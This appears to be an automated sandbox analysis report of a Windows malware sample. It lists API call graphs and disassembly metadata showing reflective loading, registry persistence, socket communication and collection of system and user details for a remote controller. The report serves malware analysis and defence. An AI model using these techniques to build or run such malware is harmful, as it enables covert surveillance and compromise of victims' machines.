43503->43449 43504->43450 43505->43452 43506->43456 43507->43495 43508->43495 43510->43496 43511->43501 43512->43493 43513->43489 43514->43493 43516 2c67245 43515->43516 43517 2c69769 DecodePointer TlsSetValue 43515->43517 43518 2c69fe4 43516->43518 43517->43516 43520 2c69fed 43518->43520 43521 2c67251 43520->43521 43522 2c6a00b Sleep 43520->43522 43546 2c6e555 43520->43546 43521->43467 43524 2c6990f 43521->43524 43523 2c6a020 43522->43523 43523->43520 43523->43521 43557 2c69896 GetLastError 43524->43557 43526 2c6725e 43529 2c697e2 43526->43529 43527 2c69917 43527->43526 43571 2c68315 66 API calls 3 library calls 43527->43571 43573 2c69db0 43529->43573 43531 2c697ee GetModuleHandleW 43574 2c6c144 43531->43574 43533 2c6982c InterlockedIncrement 43581 2c69884 43533->43581 43536 2c6c144 __lock 64 API calls 43537 2c6984d 43536->43537 43584 2c6de7f InterlockedIncrement 43537->43584 43539 2c6986b 43596 2c6988d 43539->43596 43541 2c69878 __write 43541->43475 43542->43462 43543->43472 43544->43470 43545->43472 43547 2c6e561 43546->43547 43553 2c6e57c 43546->43553 43548 2c6e56d 43547->43548 43547->43553 43555 2c6710d 66 API calls __getptd_noexit 43548->43555 43549 2c6e58f HeapAlloc 43549->43553 43554 2c6e5b6 43549->43554 43551 2c6e572 43551->43520 43553->43549 43553->43554 43556 2c68550 DecodePointer 43553->43556 43554->43520 43555->43551 43556->43553 43558 2c69754 ___set_flsgetvalue 3 API calls 43557->43558 43559 2c698ad 43558->43559 43560 2c69903 SetLastError 43559->43560 43561 2c69fe4 __calloc_crt 62 API calls 43559->43561 43560->43527 43562 2c698c1 43561->43562 43562->43560 43563 2c698c9 DecodePointer 43562->43563 43564 2c698de 43563->43564 43565 2c698e2 43564->43565 43566 2c698fa 43564->43566 43567 2c697e2 __getptd_noexit 62 API calls 43565->43567 43572 2c66e49 66 API calls 2 library calls 43566->43572 43569 2c698ea GetCurrentThreadId 43567->43569 43569->43560 43570 2c69900 43570->43560 43572->43570 43573->43531 43575 2c6c16c EnterCriticalSection 43574->43575 43576 2c6c159 43574->43576 43575->43533 43599 2c6c082 66 API calls 9 library calls 43576->43599 43578 2c6c15f 43578->43575 43600 2c68315 66 API calls 3 library calls 43578->43600 43601 2c6c06b LeaveCriticalSection 43581->43601 43583 2c69846 43583->43536 43585 2c6dea0 43584->43585 43586 2c6de9d InterlockedIncrement 43584->43586 43587 2c6dead 43585->43587 43588 2c6deaa InterlockedIncrement 43585->43588 43586->43585 43589 2c6deb7 InterlockedIncrement 43587->43589 43590 2c6deba 43587->43590 43588->43587 43589->43590 43591 2c6dec4 InterlockedIncrement 43590->43591 43593 2c6dec7 43590->43593 43591->43593 43592 2c6dee0 InterlockedIncrement 43592->43593 43593->43592 43594 2c6def0 InterlockedIncrement 43593->43594 43595 2c6defb InterlockedIncrement 43593->43595 43594->43593 43595->43539 43602 2c6c06b LeaveCriticalSection 43596->43602 43598 2c69894 43598->43541 43599->43578 43601->43583 43602->43598 43604 2c69754 ___set_flsgetvalue 3 API calls 43603->43604 43605 2c671c1 43604->43605 43618 2c69734 TlsGetValue 43605->43618 43608 2c671d0 43669 2c69788 DecodePointer 43608->43669 43609 2c671fa 43620 2c69929 43609->43620 43611 2c67215 43656 2c67175 43611->43656 43614 2c671df 43616 2c671e3 GetLastError ExitThread 43614->43616 43617 2c671f0 GetCurrentThreadId 43614->43617 43617->43611 43619 2c671cc 43618->43619 43619->43608 43619->43609 43621 2c69935 __write 43620->43621 43622 2c6994d 43621->43622 43624 2c69a37 __write 43621->43624 43670 2c66e49 66 API calls 2 library calls 43621->43670 43623 2c6995b 43622->43623 43671 2c66e49 66 API calls 2 library calls 43622->43671 43627 2c69969 43623->43627 43672 2c66e49 66 API calls 2 library calls 43623->43672 43624->43611 43629 2c69977 43627->43629 43673 2c66e49 66 API calls 2 library calls 43627->43673 43631 2c69985 43629->43631 43674 2c66e49 66 API calls 2 library calls 43629->43674 43632 2c69993 43631->43632 43675 2c66e49 66 API calls 2 library calls 43631->43675 43637 2c699a1 43632->43637 43676 2c66e49 66 API calls 2 library calls 43632->43676 43636 2c699b2 43639 2c6c144 __lock 66 API calls 43636->43639 43637->43636 43677 2c66e49 66 API calls 2 library calls 43637->43677 43640 2c699ba 43639->43640 43641 2c699c6 InterlockedDecrement 43640->43641 43642 2c699df 43640->43642 43641->43642 43644 2c699d1 43641->43644 43679 2c69a43 LeaveCriticalSection _doexit 43642->43679 43644->43642 43678 2c66e49 66 API calls 2 library calls 43644->43678 43645 2c699ec 43647 2c6c144 __lock 66 API calls 43645->43647 43648 2c699f3 43647->43648 43649 2c69a24 43648->43649 43680 2c6df0e 8 API calls 43648->43680 43682 2c69a4f LeaveCriticalSection _doexit 43649->43682 43652 2c69a31 43683 2c66e49 66 API calls 2 library calls 43652->43683 43654 2c69a08 43654->43649 43681 2c6dfa7 66 API calls 4 library calls 43654->43681 43657 2c67181 __write 43656->43657 43658 2c6990f __getptd 66 API calls 43657->43658 43659 2c67186 43658->43659 43684 2c62fb0 43659->43684 43694 2c652d9 43659->43694 43705 2c652b0 43659->43705 43716 2c630c0 43659->43716 43660 2c67190 43721 2c67156 43660->43721 43662 2c67196 43663 2c69c41 __XcptFilter 66 API calls 43662->43663 43664 2c671a7 43663->43664 43669->43614 43670->43622 43671->43623 43672->43627 43673->43629 43674->43631 43675->43632 43676->43637 43677->43636 43678->43642 43679->43645 43680->43654 43681->43649 43682->43652 43683->43624 43685 2c667ff 77 API calls 43684->43685 43691 2c62fd3 43685->43691 43686 2c6306d 43688 2c66815 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43686->43688 43687 2c63014 select 43687->43686 43687->43691 43690 2c63098 43688->43690 43689 2c63032 recv 43689->43691 43690->43660 43691->43686 43691->43687 43691->43689 43693 2c6710d 66 API calls __controlfp_s 43691->43693 43727 2c63350 43691->43727 43693->43691 43698 2c652d2 43694->43698 43695 2c6536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 43696 2c6543c 43695->43696 43697 2c653ca 43695->43697 43774 35f0497 43696->43774 43701 2c65403 OpenProcess 43697->43701 43703 2c6542f Sleep 43697->43703 43779 2c65820 105 API calls 2 library calls 43697->43779 43698->43695 43701->43697 43702 2c65415 GetExitCodeProcess 43701->43702 43702->43697 43703->43701 43706 2c6536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 43705->43706 43713 2c652cc 43705->43713 43707 2c6543c 43706->43707 43708 2c653ca 43706->43708 43715 35f0497 583 API calls 43707->43715 43711 2c65403 OpenProcess 43708->43711 43714 2c6542f Sleep 43708->43714 43953 2c65820 105 API calls 2 library calls 43708->43953 43710 2c65442 43710->43660 43711->43708 43712 2c65415 GetExitCodeProcess 43711->43712 43712->43708 43713->43706 43714->43711 43715->43710 43717 2c63128 43716->43717 43720 2c630d4 43716->43720 43717->43660 43718 2c630e8 Sleep 43718->43720 43719 2c63104 timeGetTime 43719->43720 43720->43717 43720->43718 43720->43719 43722 2c69896 __getptd_noexit 66 API calls 43721->43722 43723 2c67160 43722->43723 43724 2c6716b ExitThread 43723->43724 43954 2c69a58 79 API calls __freefls@4 43723->43954 43726 2c6716a 43726->43724 43728 2c63366 43727->43728 43729 2c61100 70 API calls 43728->43729 43736 2c63378 _memmove 43729->43736 43730 2c634e1 43730->43691 43731 2c634c6 43732 2c611b0 70 API calls 43731->43732 43733 2c634d8 43732->43733 43733->43691 43734 2c63403 timeGetTime 43735 2c611b0 70 API calls 43734->43735 43735->43736 43736->43730 43736->43731 43736->43734 43737 2c611b0 70 API calls 43736->43737 43739 2c654c0 43736->43739 43737->43736 43740 2c6580d 43739->43740 43741 2c654dc 43739->43741 43740->43736 43742 2c65707 VirtualAlloc 43741->43742 43743 2c654e7 RegOpenKeyExW 43741->43743 43745 2c65745 43742->43745 43744 2c65515 RegQueryValueExW 43743->43744 43751 2c655ba 43743->43751 43746 2c655ad RegCloseKey 43744->43746 43747 2c6553a 43744->43747 43749 2c667ff 77 API calls 43745->43749 43746->43751 43748 2c667ff 77 API calls 43747->43748 43752 2c65540 _memset 43748->43752 43750 2c65758 43749->43750 43753 2c656f8 43750->43753 43757 2c65788 RegCreateKeyW 43750->43757 43751->43753 43754 2c655f5 43751->43754 43756 2c6554d RegQueryValueExW 43752->43756 43758 2c6721b 743 API calls 43753->43758 43755 2c655fe VirtualFree 43754->43755 43765 2c65611 _memset 43754->43765 43755->43765 43759 2c655aa 43756->43759 43760 2c65569 VirtualAlloc 43756->43760 43761 2c657a3 RegDeleteValueW RegSetValueExW 43757->43761 43762 2c657ca RegCloseKey 43757->43762 43763 2c657f3 Sleep 43758->43763 43759->43746 43764 2c655a5 43760->43764 43761->43762 43762->43753 43771 2c62d10 43763->43771 43764->43759 43766 2c667ff 77 API calls 43765->43766 43768 2c656b1 43766->43768 43767 2c656e6 moneypunct 43767->43736 43768->43767 43769 2c660df 71 API calls 43768->43769 43769->43767 43772 2c62d70 43771->43772 43773 2c62d21 setsockopt CancelIo InterlockedExchange closesocket SetEvent 43771->43773 43772->43740 43773->43772 43780 35f00cd GetPEB 43774->43780 43777 2c65442 43777->43660 43778 35f04a8 43778->43777 43782 35f01cb 43778->43782 43779->43697 43781 35f00e5 43780->43781 43781->43778 43783 35f01df 43782->43783 43784 35f01e6 43782->43784 43783->43777 43784->43783 43785 35f021e VirtualAlloc 43784->43785 43785->43783 43786 35f0238 43785->43786 43787 35f03a3 43786->43787 43788 35f0330 LoadLibraryA 43786->43788 43787->43783 43790 37811f2 43787->43790 43788->43783 43788->43786 43791 37811fd 43790->43791 43792 3781202 43790->43792 43808 3788262 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 43791->43808 43796 37810fc 43792->43796 43795 3781210 43795->43783 43798 3781108 ___DllMainCRTStartup 43796->43798 43797 3781155 43806 37811a5 ___DllMainCRTStartup 43797->43806 43861 377e480 43797->43861 43798->43797 43798->43806 43809 3780f98 43798->43809 43802 3781185 43804 3780f98 __CRT_INIT@12 149 API calls 43802->43804 43802->43806 43803 377e480 ___DllMainCRTStartup 526 API calls 43805 378117c 43803->43805 43804->43806 43807 3780f98 __CRT_INIT@12 149 API calls 43805->43807 43806->43795 43807->43802 43808->43792 43810 3780fa4 ___DllMainCRTStartup 43809->43810 43811 3780fac 43810->43811 43812 3781026 43810->43812 43865 3781a1b HeapCreate 43811->43865 43814 378102c 43812->43814 43815 3781087 43812->43815 43821 378104a 43814->43821 43827 3780fb5 ___DllMainCRTStartup 43814->43827 43875 3781ce6 66 API calls _doexit 43814->43875 43816 378108c 43815->43816 43817 37810e5 43815->43817 43880 3783ca0 TlsGetValue 43816->43880 43817->43827 43908 3783fa6 79 API calls __freefls@4 43817->43908 43818 3780fb1 43820 3780fbc 43818->43820 43818->43827 43866 3784014 86 API calls 5 library calls 43820->43866 43826 378105e 43821->43826 43876 3787dfb 67 API calls _free 43821->43876 43879 3781071 70 API calls __mtterm 43826->43879 43827->43797 43829 3780fc1 __RTC_Initialize 43833 3780fc5 43829->43833 43840 3780fd1 GetCommandLineA 43829->43840 43867 3781a39 HeapDestroy 43833->43867 43834 3781054 43877 3783cf1 70 API calls _free 43834->43877 43835 37810a9 DecodePointer 43841 37810be 43835->43841 43838 3780fca 43838->43827 43839 3781059 43878 3781a39 HeapDestroy 43839->43878 43868 378817f 71 API calls 2 library calls 43840->43868 43844 37810d9 43841->43844 43845 37810c2 43841->43845 43902 377f639 43844->43902 43889 3783d2e 43845->43889 43846 3780fe1 43869 3787bb6 73 API calls __calloc_crt 43846->43869 43850 37810c9 GetCurrentThreadId 43850->43827 43851 3780feb 43852 3780fef 43851->43852 43871 37880c4 95 API calls 3 library calls 43851->43871 43870 3783cf1 70 API calls _free 43852->43870 43855 3780ffb 43860 378100f 43855->43860 43872 3787e4e 94 API calls 6 library calls 43855->43872 43858 3781004 43858->43860 43873 3781af9 77 API calls 4 library calls 43858->43873 43860->43838 43874 3787dfb 67 API calls _free 43860->43874 43862 377e4af 43861->43862 43863 377e489 43861->43863 43862->43802 43862->43803 43863->43862 43864 377e491 CreateThread WaitForSingleObject 43863->43864 43864->43862 43909 377df10 43864->43909 43865->43818 43866->43829 43867->43838 43868->43846 43869->43851 43870->43833 43871->43855 43872->43858 43873->43860 43874->43852 43875->43821 43876->43834 43877->43839 43878->43826 43879->43827 43881 3781091 43880->43881 43882 3783cb5 DecodePointer TlsSetValue 43880->43882 43883 3784534 43881->43883 43882->43881 43885 378453d 43883->43885 43884 378a6f2 __calloc_crt 65 API calls 43884->43885 43885->43884 43886 378109d 43885->43886 43887 378455b Sleep 43885->43887 43886->43827 43886->43835 43888 3784570 43887->43888 43888->43885 43888->43886 43890 3784300 ___DllMainCRTStartup 43889->43890 43891 3783d3a GetModuleHandleW 43890->43891 43892 3788e5b __lock 64 API calls 43891->43892 43893 3783d78 InterlockedIncrement 43892->43893 43894 3783dd0 __getptd_noexit LeaveCriticalSection 43893->43894 43895 3783d92 43894->43895 43896 3788e5b __lock 64 API calls 43895->43896 43897 3783d99 43896->43897 43898 3784d46 ___addlocaleref 8 API calls 43897->43898 43899 3783db7 43898->43899 43900 3783dd9 __getptd_noexit LeaveCriticalSection 43899->43900 43901 3783dc4 ___DllMainCRTStartup 43900->43901 43901->43850 43903 377f644 RtlFreeHeap 43902->43903 43907 377f66d _free 43902->43907 43904 377f659 43903->43904 43903->43907 43905 377f91b __wcsnicmp_l 64 API calls 43904->43905 43906 377f65f GetLastError 43905->43906 43906->43907 43907->43827 43908->43827 43910 3780542 67 API calls 43909->43910 43911 377df5a Sleep 43910->43911 43912 377df97 43911->43912 43913 377df74 43911->43913 43915 377dfa4 GetLocalTime wsprintfW SetUnhandledExceptionFilter 43912->43915 43916 377df9f 43912->43916 43914 377f707 77 API calls 43913->43914 43918 377df7b 43914->43918 43917 377fa29 289 API calls 43915->43917 43919 3777620 14 API calls 43916->43919 43920 377e003 CloseHandle 43917->43920 43921 377fa29 289 API calls 43918->43921 43919->43915 43922 377f707 77 API calls 43920->43922 43923 377df8d CloseHandle 43921->43923 43924 377e014 43922->43924 43923->43912 43925 377e022 43924->43925 43926 3772c90 8 API calls 43924->43926 43927 377f707 77 API calls 43925->43927 43926->43925 43928 377e036 43927->43928 43929 3779730 80 API calls 43928->43929 43934 377e04e 43928->43934 43929->43934 43930 377f876 66 API calls __NMSG_WRITE 43930->43934 43931 377e189 EnumWindows 43932 377e1a5 Sleep EnumWindows 43931->43932 43931->43934 43932->43932 43932->43934 43933 3780542 67 API calls 43933->43934 43934->43930 43934->43931 43934->43933 43935 377e1f0 Sleep 43934->43935 43936 377e239 CreateEventA 43934->43936 43952 3772da0 306 API calls 43934->43952 43935->43934 43937 377f876 __NMSG_WRITE 66 API calls 43936->43937 43942 377e281 43937->43942 43938 377ca70 113 API calls 43938->43942 43939 377e2bf Sleep RegOpenKeyExW 43941 377e2f5 RegQueryValueExW 43939->43941 43939->43942 43940 3775430 268 API calls 43940->43942 43941->43942 43942->43938 43942->43939 43942->43940 43943 377e339 43942->43943 43944 377e345 CloseHandle 43943->43944 43945 377fa29 289 API calls 43943->43945 43946 377e39f Sleep 43943->43946 43947 377e422 WaitForSingleObject CloseHandle 43943->43947 43948 3780542 67 API calls 43943->43948 43949 377e3dd Sleep CloseHandle 43943->43949 43950 377e3cd WaitForSingleObject CloseHandle 43943->43950 43944->43934 43945->43943 43946->43943 43947->43943 43951 377e43c Sleep CloseHandle 43948->43951 43949->43934 43950->43949 43951->43934 43952->43934 43953->43708 43954->43726 43955->43483 43956 2c63200 Sleep 43957 2c80254 43956->43957 43958 2c6474c lstrlenW 43959 2c7fff8 43958->43959 43960 2c6608a 43961 2c660a0 RegOpenKeyExW 43960->43961 43962 2c63f35 __wcsrev 43961->43962 43963 2c6638b 43964 2c61100 70 API calls 43963->43964 43965 2c66390 43964->43965 43966 2bd0032 43977 2bd0ae4 GetPEB 43966->43977 43969 2bd0ae4 GetPEB 43972 2bd02a7 43969->43972 43970 2bd04a6 GetNativeSystemInfo 43971 2bd04d3 VirtualAlloc 43970->43971 43975 2bd0a02 43970->43975 43973 2bd04ec VirtualAlloc 43971->43973 43974 2bd04ff 43971->43974 43972->43970 43972->43975 43973->43974 43979 2c67813 43974->43979 43978 2bd029b 43977->43978 43978->43969 43980 2c67823 43979->43980 43981 2c6781e 43979->43981 43985 2c6771d 43980->43985 43993 2c6b54b GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 43981->43993 43984 2c67831 43984->43975 43986 2c67729 __write 43985->43986 43987 2c67776 43986->43987 43988 2c677c6 __write 43986->43988 43994 2c675b9 43986->43994 43987->43988 43990 2c677a6 43987->43990 43992 2c675b9 __CRT_INIT@12 149 API calls 43987->43992 43988->43984 43990->43988 43991 2c675b9 __CRT_INIT@12 149 API calls 43990->43991 43991->43988 43992->43990 43993->43980 43995 2c675c5 __write 43994->43995 43996 2c67647 43995->43996 43997 2c675cd 43995->43997 43999 2c6764d 43996->43999 44000 2c676a8 43996->44000 44047 2c6803b HeapCreate 43997->44047 44006 2c6766b 43999->44006 44013 2c675d6 __write 43999->44013 44057 2c68306 66 API calls _doexit 43999->44057 44001 2c67706 44000->44001 44002 2c676ad 44000->44002 44001->44013 44063 2c69a58 79 API calls __freefls@4 44001->44063 44004 2c69754 ___set_flsgetvalue 3 API calls 44002->44004 44003 2c675d2 44005 2c675dd 44003->44005 44003->44013 44008 2c676b2 44004->44008 44048 2c69ac6 86 API calls 5 library calls 44005->44048 44011 2c6767f 44006->44011 44058 2c6b0e4 67 API calls _free 44006->44058 44012 2c69fe4 __calloc_crt 66 API calls 44008->44012 44061 2c67692 70 API calls __mtterm 44011->44061 44016 2c676be 44012->44016 44013->43987 44016->44013 44018 2c676ca DecodePointer 44016->44018 44017 2c67675 44059 2c697a5 70 API calls _free 44017->44059 44025 2c676df 44018->44025 44021 2c675e2 __RTC_Initialize 44024 2c675f2 GetCommandLineA 44021->44024 44039 2c675e6 44021->44039 44022 2c675eb 44022->44013 44023 2c6767a 44060 2c68059 HeapDestroy 44023->44060 44050 2c6b468 71 API calls 2 library calls 44024->44050 44028 2c676e3 44025->44028 44029 2c676fa 44025->44029 44032 2c697e2 __getptd_noexit 66 API calls 44028->44032 44062 2c66e49 66 API calls 2 library calls 44029->44062 44030 2c67602 44051 2c6ae9f 73 API calls __calloc_crt 44030->44051 44035 2c676ea GetCurrentThreadId 44032->44035 44034 2c6760c 44036 2c67610 44034->44036 44053 2c6b3ad 95 API calls 3 library calls 44034->44053 44035->44013 44052 2c697a5 70 API calls _free 44036->44052 44049 2c68059 HeapDestroy 44039->44049 44040 2c6761c 44041 2c67630 44040->44041 44054 2c6b137 94 API calls 6 library calls 44040->44054 44046 2c67635 44041->44046 44056 2c6b0e4 67 API calls _free 44041->44056 44044 2c67625 44044->44041 44055 2c68119 77 API calls 4 library calls 44044->44055 44046->44013 44047->44003 44048->44021 44049->44022 44050->44030 44051->44034 44052->44039 44053->44040 44054->44044 44055->44041 44056->44036 44057->44006 44058->44017 44059->44023 44060->44011 44061->44013 44062->44013 44063->44013 44064 2c64274 44065 2c7f814 CreateThread 44064->44065 44067 2c66110 44065->44067 44067->44067 44068 2c65eb2 Sleep 44071 2c66f17 44068->44071 44073 2c66f21 44071->44073 44072 2c66e83 _malloc 66 API calls 44072->44073 44073->44072 44074 2c65ec9 44073->44074 44076 2c66f3d std::exception::exception 44073->44076 44083 2c68550 DecodePointer 44073->44083 44082 2c66f7b 44076->44082 44084 2c673e9 76 API calls __cinit 44076->44084 44078 2c66f85 44086 2c67836 RaiseException 44078->44086 44081 2c66f96 44085 2c66e24 66 API calls std::exception::operator= 44082->44085 44083->44073 44084->44082 44085->44078 44086->44081 44087 2c7f0df 44094 2c62c60 WSAStartup CreateEventW InterlockedExchange 44087->44094 44089 2c66f17 77 API calls 44090 2c7f0e4 44089->44090 44090->44089 44091 2c7f7db 44090->44091 44097 2c65a20 CreateEventW 44091->44097 44095 2c66815 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 44094->44095 44096 2c62cff 44095->44096 44096->44090 44098 2c65a83 44097->44098 44099 2c65a79 44097->44099 44125 2c66410 HeapCreate 44098->44125 44131 2c61280 DeleteCriticalSection RaiseException __CxxThrowException@8 44099->44131 44103 2c65b12 44132 2c61280 DeleteCriticalSection RaiseException __CxxThrowException@8 44103->44132 44104 2c65b1c CreateEventW 44105 2c65b55 44104->44105 44106 2c65b5f CreateEventW 44104->44106 44133 2c61280 DeleteCriticalSection RaiseException __CxxThrowException@8 44105->44133 44109 2c65b84 CreateEventW 44106->44109 44110 2c65b7a 44106->44110 44112 2c65b9f 44109->44112 44113 2c65ba9 InitializeCriticalSectionAndSpinCount 44109->44113 44134 2c61280 DeleteCriticalSection RaiseException __CxxThrowException@8 44110->44134 44135 2c61280 DeleteCriticalSection RaiseException __CxxThrowException@8 44112->44135 44115 2c65c77 InitializeCriticalSectionAndSpinCount 44113->44115 44116 2c65c6d 44113->44116 44118 2c65c8e 44115->44118 44119 2c65c98 InterlockedExchange timeGetTime CreateEventW CreateEventW 44115->44119 44136 2c61280 DeleteCriticalSection RaiseException __CxxThrowException@8 44116->44136 44137 2c61280 DeleteCriticalSection RaiseException __CxxThrowException@8 44118->44137 44121 2c667ff 77 API calls 44119->44121 44122 2c65d2b 44121->44122 44123 2c667ff 77 API calls 44122->44123 44124 2c65d3b 44123->44124 44126 2c66437 44125->44126 44127 2c66441 44125->44127 44138 2c61280 DeleteCriticalSection RaiseException __CxxThrowException@8 44126->44138 44129 2c65af2 InitializeCriticalSectionAndSpinCount 44127->44129 44139 2c66e49 66 API calls 2 library calls 44127->44139 44129->44103 44129->44104 44131->44098 44132->44104 44133->44106 44134->44109 44135->44113 44136->44115 44137->44119 44138->44127 44139->44129 44140 2c7f63d send

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 03775430 Relevance: 93.2, APIs: 40, Strings: 13, Instructions: 440stringnetworklibraryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 3775430-37754b7 call 377f707 call 3786770 * 3 gethostname gethostbyname 9 37754bd-3775504 inet_ntoa call 37803cf * 2 0->9 10 377555c-377569d MultiByteToWideChar * 2 GetLastInputInfo GetTickCount wsprintfW MultiByteToWideChar * 2 call 3777490 GetSystemInfo wsprintfW call 3776c50 call 3776ee0 GetForegroundWindow 0->10 9->10 20 3775506-3775508 9->20 23 37756b2-37756c0 10->23 24 377569f-37756ac GetWindowTextW 10->24 22 3775510-377555a inet_ntoa call 37803cf * 2 20->22 22->10 26 37756c2 23->26 27 37756cc-37756f0 lstrlenW call 3776d70 23->27 24->23 26->27 33 3775702-3775726 call 377f876 27->33 34 37756f2-37756ff call 377f876 27->34 39 3775732-3775756 lstrlenW call 3776d70 33->39 40 3775728 33->40 34->33 43 3775768-37757b9 GetModuleHandleW GetProcAddress 39->43 44 3775758-3775765 call 377f876 39->44 40->39 46 37757c6-37757cd GetSystemInfo 43->46 47 37757bb-37757c4 GetNativeSystemInfo 43->47 44->43 49 37757d3-37757e1 46->49 47->49 50 37757e3-37757eb 49->50 51 37757ed-37757f2 49->51 50->51 52 37757f4 50->52 53 37757f9-3775820 wsprintfW call 3776a70 GetCurrentProcessId 51->53 52->53 56 3775885-377588c call 3776690 53->56 57 3775822-377583c OpenProcess 53->57 65 377589e-37758ab 56->65 66 377588e-377589c 56->66 57->56 58 377583e-3775853 K32GetProcessImageFileNameW 57->58 60 3775855-377585c 58->60 61 377585e-3775866 call 37780f0 58->61 63 377587f CloseHandle 60->63 68 377586b-377586d 61->68 63->56 67 37758ac-37759a1 call 377f876 call 3776490 call 3776150 call 377fc0e GetTickCount call 378043c call 37803a8 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 65->67 66->67 83 37759a3-37759c8 67->83 84 37759ca-37759e9 67->84 70 377586f-3775876 68->70 71 3775878-377587e 68->71 70->63 71->63 85 37759ea-3775a0f call 3775a30 call 3773160 83->85 84->85 88 3775a11-3775a2e call 377efff call 377f00a 85->88
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0377F707: _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                      • _memset.LIBCMT ref: 0377546C
                                                                                                                                                                      • _memset.LIBCMT ref: 03775485
                                                                                                                                                                      • _memset.LIBCMT ref: 03775495
                                                                                                                                                                      • gethostname.WS2_32(?,00000032), ref: 037754A3
                                                                                                                                                                      • gethostbyname.WS2_32(?), ref: 037754AD
                                                                                                                                                                      • inet_ntoa.WS2_32 ref: 037754C5
                                                                                                                                                                      • _strcat_s.LIBCMT ref: 037754D8
                                                                                                                                                                      • _strcat_s.LIBCMT ref: 037754F1
                                                                                                                                                                      • inet_ntoa.WS2_32 ref: 0377551A
                                                                                                                                                                      • _strcat_s.LIBCMT ref: 0377552D
                                                                                                                                                                      • _strcat_s.LIBCMT ref: 03775546
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03775573
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03775587
                                                                                                                                                                      • GetLastInputInfo.USER32(?), ref: 0377559A
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 037755A0
                                                                                                                                                                      • wsprintfW.USER32 ref: 037755D5
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 037755E8
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 037755FC
                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03775653
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377566C
                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 03775695
                                                                                                                                                                      • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 037756AC
                                                                                                                                                                      • lstrlenW.KERNEL32(000008CC), ref: 037756D3
                                                                                                                                                                      • lstrlenW.KERNEL32(00000994), ref: 03775739
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 037757AA
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 037757B1
                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 037757C2
                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 037757CD
                                                                                                                                                                      • wsprintfW.USER32 ref: 03775806
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 03775818
                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0377582E
                                                                                                                                                                      • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 0377584B
                                                                                                                                                                      • CloseHandle.KERNEL32(03795164), ref: 0377587F
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 037758E9
                                                                                                                                                                      • __time64.LIBCMT ref: 037758F8
                                                                                                                                                                      • __localtime64.LIBCMT ref: 0377592F
                                                                                                                                                                      • wsprintfW.USER32 ref: 03775968
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 0377597D
                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 0377598C
                                                                                                                                                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 03775999
                                                                                                                                                                        • Part of subcall function 037780F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03778132
                                                                                                                                                                        • Part of subcall function 037780F0: lstrcmpiW.KERNEL32(?,A:\), ref: 03778166
                                                                                                                                                                        • Part of subcall function 037780F0: lstrcmpiW.KERNEL32(?,B:\), ref: 03778176
                                                                                                                                                                        • Part of subcall function 037780F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 037781A6
                                                                                                                                                                        • Part of subcall function 037780F0: lstrlenW.KERNEL32(?), ref: 037781B7
                                                                                                                                                                        • Part of subcall function 037780F0: __wcsnicmp.LIBCMT ref: 037781CE
                                                                                                                                                                        • Part of subcall function 037780F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 03778204
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                                                                                                                                                      • String ID: %d min$1.0$2024.12. 3$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                                                                                                                                                      • API String ID: 1101047656-1568689114
